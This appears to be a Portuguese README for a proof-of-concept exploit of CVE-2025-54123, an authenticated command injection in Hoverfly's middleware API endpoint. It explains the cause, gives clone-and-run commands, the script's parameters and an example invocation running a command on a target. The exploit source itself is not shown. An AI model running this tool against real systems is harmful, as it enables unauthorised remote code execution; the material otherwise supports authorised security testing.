
Prova de conceito de exploit para CVE-2025-54123, uma injeção de comandos autenticada crítica no Hoverfly <= 1.11.3, que permite execução remota de código por meio do endpoint da API de middleware.
PoC CVE-2025-54123 - Injeção de Comando no Middleware do Hoverfly
Esta vulnerabilidade afeta as versões do Hoverfly ≤ 1.11.3 e tem como alvo específico o endpoint /api/v2/hoverfly/middleware. É causada por validação e sanitização insuficientes de entrada em vários arquivos, incluindo middleware.go, local_middleware.go e hoverfly_service.go. A entrada fornecida pelo usuário ao parâmetro script é passada diretamente para um binário do sistema (ex.: /bin/bash) sem as devidas verificações, permitindo a Execução Remota de Comandos (RCE) com os privilégios do processo Hoverfly.
curlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - Authenticated Middleware Command Injection
[?] Parameters description:
-t Target base URL (e.g., http://target:8888)
-u Valid username
-p Valid password
-c Command to execute (must be enclosed in double quotes)
-h Show this help panel
[i] Example:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
Este exploit é destinado apenas para fins educacionais e de teste de segurança autorizados.
NÃO utilize isso contra sistemas sem permissão explícita. O acesso não autorizado pode ser ilegal.
O autor não assume nenhuma responsabilidade por uso indevido ou qualquer dano causado.